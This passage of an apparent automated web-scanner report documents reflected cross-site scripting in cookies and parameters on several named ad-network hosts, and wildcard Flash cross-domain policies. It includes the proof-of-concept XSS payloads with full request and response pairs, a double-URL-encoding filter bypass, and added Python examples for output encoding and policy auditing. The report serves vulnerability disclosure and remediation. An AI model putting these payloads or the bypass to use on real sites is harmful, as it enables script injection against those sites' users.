Set-Cookie: targ=1; domain=collective-media.net; path=/; expires=Tue, 26-Jul-2011 20:42:38 GMT
Set-Cookie: brlg=1; domain=collective-media.net; path=/; expires=Tue, 26-Jul-2011 20:42:38 GMT

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-10116970907_1311108158","http://ad.doubleclick.net/adj/q1.q.boston/be_home;net=q1;u=,q1-10116970907_1311108158,11fda490648f83c7628e';alert(1)//4dbde60b8a6,ent,;;cmw=owl;sz=728x90;net=q1;ord1=58867;contx=ent;dc=w;btg=;ord=84105094?","728","90",false);</scr'+'ipt>
...[SNIP]...

4.146. http://a.collective-media.net/cmadj/q1.q.boston/bus [cli cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.boston/bus

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab145'%3balert(1)//cf264ed780e was submitted in the cli cookie. This input was echoed as ab145';alert(1)//cf264ed780e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.boston/bus;sz=300x250;net=q1;ord=927603973;ord1=555040;cmpgurl=http%253A//www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html%253Fp1%253DNews_links? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: cli=11fda490648f83cab145'%3balert(1)//cf264ed780e; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; targ=1; brlg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 20:44:17 GMT
Content-Length: 7237
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-10320442410_1311108257","http://ad.doubleclick.net/adj/q1.q.boston/bus;net=q1;u=,q1-10320442410_1311108257,11fda490648f83cab145';alert(1)//cf264ed780e,jobs,;;cmw=owl;sz=300x250;net=q1;ord1=555040;contx=jobs;dc=w;btg=;ord=927603973?","300","250",false);</scr'+'ipt>
...[SNIP]...

4.147. http://seg.sharethis.com/getSegment.php [__stid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://seg.sharethis.com
Path:   /getSegment.php

Issue detail

The value of the __stid cookie is copied into the HTML document as plain text between tags. The payload 816eb<script>alert(1)</script>740fa5f17ad was submitted in the __stid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /getSegment.php?purl=http%3A%2F%2Fwww.factset.com%2Fproducts%2Fim&jsref=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&rnd=1311085610127 HTTP/1.1
Host: seg.sharethis.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.factset.com/products/im
Cookie: __stid=CspjoE3JR6aX8hTKEPglAg==816eb<script>alert(1)</script>740fa5f17ad

Response

HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Tue, 19 Jul 2011 14:26:44 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
P3P: "policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 2615


           <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
           <html>
           <head>
           <meta http-equiv="Content-type" content="text/html;charset=UTF-8">
           
...[SNIP]...
<div style='display:none'>clicookie:CspjoE3JR6aX8hTKEPglAg==816eb<script>alert(1)</script>740fa5f17ad
userid:
</div>
...[SNIP]...

4.148. http://tag.admeld.com/ad/iframe/610/bostonglobe/160x600/bg_1064637_61606216 [meld_sess cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/610/bostonglobe/160x600/bg_1064637_61606216

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e2aa"><script>alert(1)</script>9c3df17f431 was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/610/bostonglobe/160x600/bg_1064637_61606216?t=1311108279704&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue HTTP/1.1
Host: tag.admeld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: meld_sess=22e7a59d-553a-4d2e-a8a1-6434f26cd5994e2aa"><script>alert(1)</script>9c3df17f431; __qca=P0-1593807240-1305111258024; D41U=3jJQGUe0Mr1_sOR6QlbZNwyD3LjZHCydqkKN1RXQ0AEdL95ZdcIpbDw

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 1928
Content-Type: text/html
Date: Tue, 19 Jul 2011 20:44:46 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<script type="text/javascript">
document.write
...[SNIP]...
<script type="text/javascript" src="http://a.tribalfusion.com/j.ad?site=admeldae&adSpace=audienceselect&size=1x1&admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd5994e2aa"><script>alert(1)</script>9c3df17f431&admeld_dataprovider_id=10&admeld_callback=http://tag.admeld.com/pixel">
...[SNIP]...
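The three findings above reflect the same kind of cookie value into three different contexts: the cli cookie on a.collective-media.net lands inside a JavaScript string literal, the __stid cookie on seg.sharethis.com lands as text between tags, and the meld_sess cookie on tag.admeld.com lands inside a double-quoted src attribute that is also a URL. Each context needs its own encoder, and an encoder for the wrong context does not help. The following is an added example, not code from any of these sites: the payloads are the ones the scanner submitted, the two render functions are simplified stand-ins for the real responses (the tribalfusion j.ad URL is copied from the admeld response), and the encoders are Python's standard library.

```python
"""Context-aware output encoding for the three reflection contexts seen in
the findings above. Added example; the markup templates are assumptions
that imitate the real responses, the payloads are the scanner's."""
import html
import json
from urllib.parse import quote

# Payloads exactly as the report shows them reaching the response.
JS_PAYLOAD = "11fda490648f83cab145';alert(1)//cf264ed780e"
TEXT_PAYLOAD = "816eb<script>alert(1)</script>740fa5f17ad"
ATTR_PAYLOAD = '4e2aa"><script>alert(1)</script>9c3df17f431'


def js_string_literal(value: str) -> str:
    """Emit value as a complete JS string literal (quotes included) that is
    safe inside an inline <script>. json.dumps escapes backslash, double
    quote, control characters and, with the default ensure_ascii, the
    U+2028/U+2029 line terminators; the replaces cover the single quote
    and '</script>' so the result is safe whichever quote style the
    surrounding template would otherwise have used."""
    return (json.dumps(value)
            .replace("'", "\\u0027")
            .replace("<", "\\u003c")
            .replace(">", "\\u003e"))


def html_text(value: str) -> str:
    """Text-node context: & < > are enough, quotes are harmless here."""
    return html.escape(value, quote=False)


def html_attr(value: str) -> str:
    """Quoted attribute context: also encode both quote characters."""
    return html.escape(value, quote=True)


def url_query_component(value: str) -> str:
    """A value embedded in a URL is percent-encoded first; the whole URL
    then goes through html_attr() because it sits in an attribute."""
    return quote(value, safe="")


def vulnerable_render(cli: str, stid: str, meld: str) -> str:
    """The pattern all three findings share: raw string concatenation."""
    return (
        f"<script>var u='{cli}';</script>\n"
        f"<div style='display:none'>clicookie:{stid}</div>\n"
        f'<script src="http://a.tribalfusion.com/j.ad?admeld_user_id={meld}"></script>'
    )


def hardened_render(cli: str, stid: str, meld: str) -> str:
    """Same template, each value encoded for the context it lands in.
    Note the JS template no longer supplies its own quotes."""
    src = "http://a.tribalfusion.com/j.ad?admeld_user_id=" + url_query_component(meld)
    return (
        f"<script>var u={js_string_literal(cli)};</script>\n"
        f"<div style='display:none'>clicookie:{html_text(stid)}</div>\n"
        f'<script src="{html_attr(src)}"></script>'
    )


def breaks_out(rendered: str) -> bool:
    """Oracle for these particular payloads: either a new <script> element
    appeared, or the JS string was terminated so alert(1) became a
    statement. Good enough to compare the two renderers."""
    return "<script>alert(1)" in rendered or "';alert(1)" in rendered


if __name__ == "__main__":
    print("vulnerable breaks out:",
          breaks_out(vulnerable_render(JS_PAYLOAD, TEXT_PAYLOAD, ATTR_PAYLOAD)))
    print("hardened breaks out:  ",
          breaks_out(hardened_render(JS_PAYLOAD, TEXT_PAYLOAD, ATTR_PAYLOAD)))
    print(hardened_render(JS_PAYLOAD, TEXT_PAYLOAD, ATTR_PAYLOAD))
```

The JS encoder deliberately emits the surrounding quotes itself; a template that writes `'...'` around an encoded value is exactly how the `'%3balert(1)//` payload in the cli cookie escaped. The cookie-only caveat in the findings still stands: none of this changes how hard it is to plant the cookie in a victim's browser, it only removes the sink.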

4.149. http://tag.admeld.com/ad/iframe/610/bostonglobe/300x250/bg_1064637_61606228 [meld_sess cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/610/bostonglobe/300x250/bg_1064637_61606228

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c26b2"><script>alert(1)</script>0ad41bbfab3 was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/610/bostonglobe/300x250/bg_1064637_61606228?t=1311108266616&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue HTTP/1.1
Host: tag.admeld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: meld_sess=22e7a59d-553a-4d2e-a8a1-6434f26cd599c26b2"><script>alert(1)</script>0ad41bbfab3; __qca=P0-1593807240-1305111258024; D41U=3jJQGUe0Mr1_sOR6QlbZNwyD3LjZHCydqkKN1RXQ0AEdL95ZdcIpbDw

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 1584
Content-Type: text/html
Date: Tue, 19 Jul 2011 20:44:40 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<script type="text/javascript">
document.write
...[SNIP]...
<script type="text/javascript" src="http://a.tribalfusion.com/j.ad?site=admeldae&adSpace=audienceselect&size=1x1&admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599c26b2"><script>alert(1)</script>0ad41bbfab3&admeld_dataprovider_id=10&admeld_callback=http://tag.admeld.com/pixel">
...[SNIP]...

4.150. http://tag.admeld.com/ad/iframe/610/bostonglobe/728x90/bg_1064637_61606228 [meld_sess cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/610/bostonglobe/728x90/bg_1064637_61606228

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a0b1"><script>alert(1)</script>b355aa58d45 was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/610/bostonglobe/728x90/bg_1064637_61606228?t=1311108254581&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue HTTP/1.1
Host: tag.admeld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: meld_sess=22e7a59d-553a-4d2e-a8a1-6434f26cd5998a0b1"><script>alert(1)</script>b355aa58d45; __qca=P0-1593807240-1305111258024; D41U=3jJQGUe0Mr1_sOR6QlbZNwyD3LjZHCydqkKN1RXQ0AEdL95ZdcIpbDw

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 1582
Content-Type: text/html
Date: Tue, 19 Jul 2011 20:44:31 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<script type="text/javascript">
document.write
...[SNIP]...
<script type="text/javascript" src="http://a.tribalfusion.com/j.ad?site=admeldae&adSpace=audienceselect&size=1x1&admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd5998a0b1"><script>alert(1)</script>b355aa58d45&admeld_dataprovider_id=10&admeld_callback=http://tag.admeld.com/pixel">
...[SNIP]...

4.151. http://www.clickmanage.com/events/clickevent.aspx [u parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.clickmanage.com
Path:   /events/clickevent.aspx

Issue detail

The value of the u request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ae136%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252726493d2e792 was submitted in the u parameter. This input was echoed as ae136'style='x:expression(alert(1))'26493d2e792 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that the response into which user data is copied is an HTTP redirection (302). Browsers normally follow the Location header and do not render the body, so unless you can find a way to prevent the application from performing the redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability. Note also that the same decoded value appears in the Location header itself, because the u parameter is the redirect target; the header, rather than the unrendered body, is where the reflected value actually reaches the browser.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the u request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /events/clickevent.aspx?ca=10332&e=4&l=1044996461&u=http%25253A%25252F%25252Fwww.numarasoftware.com%25252Fwelcome%25252Fservice_desk.aspx%25253Fsrc%25253Dgoogle%252526trm%25253Dissue_tracking_softwareae136%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252726493d2e792&gclid=CIGmsIfNjaoCFct95QodzRHo0Q HTTP/1.1
Host: www.clickmanage.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Tue, 19 Jul 2011 14:20:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
P3P: policyref="http://www.clickmanage.com/w3c/p3p.xml", CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Location: http://www.numarasoftware.com/welcome/service_desk.aspx?src=google&trm=issue_tracking_softwareae136'style='x:expression(alert(1))'26493d2e792
Set-Cookie: uid=21367747-2c53-4cc6-a391-4d75cc92d57b; expires=Wed, 18-Jul-2012 14:20:32 GMT; path=/
Set-Cookie: cp=10332,634466676322687500,4,1044996461,599266080000000000,0*|; expires=Wed, 18-Jul-2012 14:20:32 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 262

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='http://www.numarasoftware.com/welcome/service_desk.aspx?src=google&amp;trm=issue_tracking_softwareae136'style='x:expression(alert(1))'26493d2e792'>
...[SNIP]...
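The bypass in 4.151 is an ordering bug: the filter inspects the value after the web server's single decode, while `%2527` is still `%27` and contains no quote, and only then does the application decode again and write the result into the page. The example below is added here and is not clickmanage.com's code: the blocklist, the handler functions and the `Object moved` anchor template are assumptions that reproduce the behaviour the report describes, and the payload tail is copied from the request line. It shows the vulnerable ordering beside the two remediations the report gives (drop the second decode, or validate after it), with output encoding added in both fixed versions.

```python
"""Validate-then-decode versus decode-then-validate, modelled on the
clickmanage.com u-parameter finding. Added example; the blocklist and the
handlers are assumptions, the payload is the scanner's."""
import html
from urllib.parse import unquote

# The payload tail exactly as it appears in the report's request line.
RAW_PAYLOAD = "ae136%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252726493d2e792"

# Assumed blocklist; the report only says "certain characters".
BLOCKED = ("<", ">", "'", '"')


def contains_blocked(value: str) -> bool:
    return any(ch in value for ch in BLOCKED)


def render_anchor(target: str) -> str:
    """Redirect body in the style of the IIS 'Object moved' page."""
    return f"<h2>Object moved to <a href='{target}'>here</a></h2>"


def vulnerable_handler(raw_u: str) -> str:
    """The ordering the scanner inferred: the web server has decoded once,
    the filter runs, then the application decodes again and writes the
    result into the page without encoding it."""
    once = unquote(raw_u)            # done by the web server before the app sees it
    if contains_blocked(once):       # %27 is not a quote yet, so this passes
        raise ValueError("blocked")
    twice = unquote(once)            # the needless second decode releases ' = : ( )
    return render_anchor(twice)


def fixed_handler(raw_u: str) -> str:
    """Remediation 1: no second decode (the server already canonicalised)
    plus attribute encoding on output, so even a quote that survived
    validation could not close the href."""
    once = unquote(raw_u)
    if contains_blocked(once):
        raise ValueError("blocked")
    return render_anchor(html.escape(once, quote=True))


def fixed_handler_with_custom_decode(raw_u: str) -> str:
    """Remediation 2: if the application genuinely must decode a second
    time, the check moves after that step, so the released characters are
    what gets validated."""
    canonical = unquote(unquote(raw_u))
    if contains_blocked(canonical):
        raise ValueError("blocked")
    return render_anchor(html.escape(canonical, quote=True))


if __name__ == "__main__":
    print(vulnerable_handler(RAW_PAYLOAD))
    print(fixed_handler(RAW_PAYLOAD))
    try:
        fixed_handler_with_custom_decode(RAW_PAYLOAD)
    except ValueError as exc:
        print("second handler:", exc)
```

Run against `RAW_PAYLOAD`, the vulnerable handler emits `href='ae136'style='x:expression(alert(1))'...'`, the first fixed handler emits the harmless literal `%27style%3d%27` inside the attribute, and the second rejects the request. A single-encoded `%27` is caught by all three, which is why the scanner needed the double encoding in the first place. The blocklist is defence in depth only; the attribute encoding is what actually closes the sink.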

5. Flash cross-domain policy

There are 79 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.
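A quick way to perform that review over many hosts is to parse each policy and flag the settings that widen trust: a wildcard `allow-access-from`, a wildcard subdomain, `secure="false"` (which, for a policy served over HTTPS, also admits SWFs loaded over plain HTTP), `site-control permitted-cross-domain-policies="all"` (which lets any file the host serves act as a policy file) and a wildcard `allow-http-request-headers-from`. The checker below is an added example and is not part of the scanner output; the first two sample policies are copied from findings 5.3 and 5.9 in this section, the third is a constructed restrictive policy for comparison, and the finding codes are invented labels.

```python
"""Audit a Flash crossdomain.xml for the permissive settings reported in
this section. Added example; the finding codes are invented labels, the
RESTRICTIVE sample is constructed, the other two are copied from the
report."""
from __future__ import annotations

import xml.etree.ElementTree as ET

# Copied from finding 5.3 (a.collective-media.net).
COLLECTIVE_MEDIA = """<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
<allow-http-request-headers-from domain="*" headers="*" secure="true"/>
</cross-domain-policy>"""

# Copied from finding 5.9 (ads.as4x.tmcs.ticketmaster.com).
TICKETMASTER = """<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*" />
</cross-domain-policy>"""

# Constructed: what a policy that only trusts one origin looks like.
RESTRICTIVE = """<?xml version="1.0"?>
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="master-only"/>
  <allow-access-from domain="www.example.com" to-ports="443"/>
</cross-domain-policy>"""


def audit_policy(xml_text: str) -> list[tuple[str, str]]:
    """Return (code, explanation) pairs for each permissive setting.
    The stdlib parser does not fetch the external DTD these files
    reference, so the DOCTYPE line is inert; for policies fetched from
    untrusted hosts in bulk, defusedxml is the safer parser."""
    root = ET.fromstring(xml_text)
    if root.tag != "cross-domain-policy":
        raise ValueError("not a cross-domain policy")
    findings: list[tuple[str, str]] = []

    site_control = root.find("site-control")
    if (site_control is not None
            and site_control.get("permitted-cross-domain-policies") == "all"):
        findings.append(("SITE-CONTROL-ALL",
                         "any file the host serves, an upload for instance, may act as a policy file"))

    for el in root.findall("allow-access-from"):
        domain = el.get("domain", "")
        if domain == "*":
            findings.append(("WILDCARD-DOMAIN",
                             "every origin may make credentialed two-way requests"))
        elif domain.startswith("*."):
            findings.append(("WILDCARD-SUBDOMAIN",
                             f"all hosts under {domain[1:]} are trusted"))
        # Adobe's default for 'secure' is true; false only matters when the
        # policy itself is served over HTTPS.
        if el.get("secure", "true").lower() == "false":
            findings.append(("INSECURE-ALLOWED",
                             "if served over HTTPS, SWFs loaded over plain HTTP are granted access too"))

    for el in root.findall("allow-http-request-headers-from"):
        if el.get("domain") == "*" and el.get("headers", "") == "*":
            findings.append(("WILDCARD-HEADERS",
                             "any origin may send arbitrary request headers"))
    return findings


if __name__ == "__main__":
    for name, policy in (("5.3", COLLECTIVE_MEDIA), ("5.9", TICKETMASTER),
                         ("restrictive", RESTRICTIVE)):
        print(name, audit_policy(policy) or "no findings")
```

The wildcard domain is what earns the High severity above; the other codes are the qualifiers a reviewer would want next to it when deciding whether a pure ad-serving or avatar host really has nothing worth protecting behind the policy.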


5.1. http://0.gravatar.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://0.gravatar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 0.gravatar.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=300
Content-Type: application/xml
Date: Tue, 19 Jul 2011 14:31:42 GMT
Expires: Tue, 19 Jul 2011 14:36:42 GMT
Last-Modified: Wed, 08 Sep 2010 18:32:05 GMT
Server: ECS (dca/532A)
X-Cache: HIT
Content-Length: 261
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

5.2. http://1.gravatar.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://1.gravatar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 1.gravatar.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=300
Content-Type: application/xml
Date: Tue, 19 Jul 2011 14:31:42 GMT
Expires: Tue, 19 Jul 2011 14:36:42 GMT
Last-Modified: Wed, 08 Sep 2010 18:32:05 GMT
Server: ECS (dca/532A)
X-Cache: HIT
Content-Length: 261
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

5.3. http://a.collective-media.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

